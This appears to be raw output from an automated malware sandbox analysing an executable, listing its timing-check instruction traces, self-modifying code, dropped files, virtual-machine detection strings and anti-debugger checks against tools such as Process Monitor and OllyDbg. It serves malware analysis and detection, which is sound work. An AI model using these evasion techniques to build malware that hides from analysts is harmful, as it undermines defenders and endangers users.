Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0371 second address: 4DB0375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0375 second address: 4DB0388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C69 second address: 4D40C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C6E second address: 4D40C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C74 second address: 4D40C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C78 second address: 4D40C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40C7C second address: 4D40CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b mov eax, ebx 0x0000000d popad 0x0000000e pushfd 0x0000000f jmp 00007F9899183FF3h 0x00000014 xor esi, 3FE6F8AEh 0x0000001a jmp 00007F9899183FF9h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F9899183FEEh 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D615DD second address: 4D615F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2760h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D615F1 second address: 4D61670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F9899183FF6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F9899183FF1h 0x00000019 add ecx, 2F3D7206h 0x0000001f jmp 00007F9899183FF1h 0x00000024 popfd 0x00000025 jmp 00007F9899183FF0h 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9899183FF7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61670 second address: 4D61682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop esi 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61682 second address: 4D61688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61729 second address: 4D615DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0008h 0x0000000c push 0042F258h 0x00000011 push edi 0x00000012 mov dword ptr [00434D64h], eax 0x00000017 call esi 0x00000019 mov edi, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edx, 5A8F5C70h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA04C7 second address: 4DA04CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA04CC second address: 4DA04D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA04D2 second address: 4DA04FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F9899183FEBh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA04FE second address: 4DA0550 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F98991A2763h 0x0000000c sbb ecx, 2D40C56Eh 0x00000012 jmp 00007F98991A2769h 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007F98991A275Eh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA0550 second address: 4DA0554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA0554 second address: 4DA0571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA0571 second address: 4DA0577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA0577 second address: 4DA057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA03C9 second address: 4DA042E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushfd 0x00000010 jmp 00007F9899183FF9h 0x00000015 and si, A2A6h 0x0000001a jmp 00007F9899183FF1h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F9899183FEDh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA042E second address: 4D40C69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F98991A275Eh 0x00000010 pop ebp 0x00000011 jmp 00007F98991A2760h 0x00000016 jmp dword ptr [74E5155Ch] 0x0000001c mov edi, edi 0x0000001e push ebp 0x0000001f mov ebp, esp 0x00000021 mov ecx, dword ptr fs:[00000018h] 0x00000028 mov eax, dword ptr [ebp+08h] 0x0000002b mov dword ptr [ecx+34h], 00000000h 0x00000032 cmp eax, 40h 0x00000035 jnc 00007F98991A275Dh 0x00000037 mov eax, dword ptr [ecx+eax*4+00000E10h] 0x0000003e pop ebp 0x0000003f retn 0004h 0x00000042 test eax, eax 0x00000044 je 00007F98991A2773h 0x00000046 mov eax, dword ptr [00432010h] 0x0000004b cmp eax, FFFFFFFFh 0x0000004e je 00007F98991A2769h 0x00000050 mov esi, 0042F218h 0x00000055 push esi 0x00000056 call 00007F989DAE1A37h 0x0000005b mov edi, edi 0x0000005d pushad 0x0000005e mov eax, 10DC56FDh 0x00000063 mov eax, 041C65F9h 0x00000068 popad 0x00000069 xchg eax, ebp 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d pushfd 0x0000006e jmp 00007F98991A2761h 0x00000073 or si, 8CC6h 0x00000078 jmp 00007F98991A2761h 0x0000007d popfd 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D409CF second address: 4D40A02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc eax 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d push eax 0x0000000e mov bx, A0AAh 0x00000012 pop edi 0x00000013 popad 0x00000014 lock xadd dword ptr [ecx], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9899183FEDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D40A02 second address: 4D40A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F98991A2767h 0x00000008 pushfd 0x00000009 jmp 00007F98991A2768h 0x0000000e sub ah, FFFFFFF8h 0x00000011 jmp 00007F98991A275Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a inc eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F98991A275Bh 0x00000023 call 00007F98991A2768h 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA0639 second address: 4DA0680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9899183FF6h 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 mov esi, ebx 0x00000014 pop edi 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F9899183FF2h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DA0680 second address: 4DA06B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F98991A2763h 0x0000000a or eax, 6D473B2Eh 0x00000010 jmp 00007F98991A2769h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB01E6 second address: 4DB0241 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9899183FF3h 0x00000013 add ecx, 0DAC564Eh 0x00000019 jmp 00007F9899183FF9h 0x0000001e popfd 0x0000001f mov eax, 2673B257h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0241 second address: 4DB025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2768h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB025D second address: 4DB0261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0134 second address: 4DB01A5 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F98991A2761h 0x0000000d xor ecx, 08890796h 0x00000013 jmp 00007F98991A2761h 0x00000018 popfd 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F98991A2763h 0x00000025 adc esi, 048F40CEh 0x0000002b jmp 00007F98991A2769h 0x00000030 popfd 0x00000031 mov esi, 22A23AD7h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB000B second address: 4DB0011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0011 second address: 4DB0041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F98991A275Eh 0x00000010 sbb ecx, 5CC07188h 0x00000016 jmp 00007F98991A275Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e movzx ecx, bx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0041 second address: 4DB005E instructions: 0x00000000 rdtsc 0x00000002 mov esi, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9899183FF3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB005E second address: 4DB0064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0064 second address: 4DB0068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0068 second address: 4DB006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB006C second address: 4DB00F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007F9899183FEDh 0x0000000f pushfd 0x00000010 jmp 00007F9899183FF0h 0x00000015 add esi, 2CE47178h 0x0000001b jmp 00007F9899183FEBh 0x00000020 popfd 0x00000021 pop eax 0x00000022 pushad 0x00000023 mov cx, dx 0x00000026 popad 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b mov si, 95F9h 0x0000002f pushfd 0x00000030 jmp 00007F9899183FF6h 0x00000035 and esi, 32301B08h 0x0000003b jmp 00007F9899183FEBh 0x00000040 popfd 0x00000041 popad 0x00000042 pop ebp 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F9899183FF0h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB00F3 second address: 4DB0102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB05D6 second address: 4DB061C instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov si, bx 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007F9899183FEEh 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007F9899183FF0h 0x00000019 mov ebp, esp 0x0000001b jmp 00007F9899183FF0h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSpecial instruction interceptor: First address: 81C96A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSpecial instruction interceptor: First address: 81CA36 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSpecial instruction interceptor: First address: 81C98F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSpecial instruction interceptor: First address: 9BCBD1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0081C9F3 rdtsc 0_2_0081C9F3
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow / User API: threadDelayed 905Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow / User API: threadDelayed 962Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow / User API: threadDelayed 951Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow / User API: threadDelayed 933Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow / User API: threadDelayed 1008Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow / User API: threadDelayed 944Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\zmTSHkabY6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\zmTSHkabY6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\zmTSHkabY6.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332Thread sleep count: 163 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332Thread sleep count: 142 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2504Thread sleep count: 905 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2504Thread sleep time: -1810905s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3736Thread sleep count: 962 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3736Thread sleep time: -1924962s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332Thread sleep count: 110 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332Thread sleep count: 100 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 2332Thread sleep count: 91 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3624Thread sleep count: 951 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3624Thread sleep time: -1902951s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3444Thread sleep count: 933 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 3444Thread sleep time: -1866933s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 4048Thread sleep count: 1008 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 4048Thread sleep time: -2017008s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 4900Thread sleep count: 944 > 30Jump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exe TID: 4900Thread sleep time: -1888944s >= -30000sJump to behavior
Source: zmTSHkabY6.exe, zmTSHkabY6.exe, 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.7.drBinary or memory string: VMware
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: zmTSHkabY6.exe, 00000000.00000002.3223329343.0000000005603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWUd
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000002.3223329343.0000000005603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: vmci.sys
Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: VMware20,1
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: zmTSHkabY6.exe, 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\zmTSHkabY6.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\zmTSHkabY6.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\zmTSHkabY6.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\zmTSHkabY6.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zmTSHkabY6.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\zmTSHkabY6.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zmTSHkabY6.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\zmTSHkabY6.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\zmTSHkabY6.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile opened: NTICE
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile opened: SICE
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\zmTSHkabY6.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0081C9F3 rdtsc 0_2_0081C9F3
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0041366F mov eax, dword ptr fs:[00000030h]0_2_0041366F
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h]0_2_0040EF0D
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00D99C83 push dword ptr fs:[00000030h]0_2_00D99C83
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E938D6 mov eax, dword ptr fs:[00000030h]0_2_00E938D6
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E8F174 mov eax, dword ptr fs:[00000030h]0_2_00E8F174
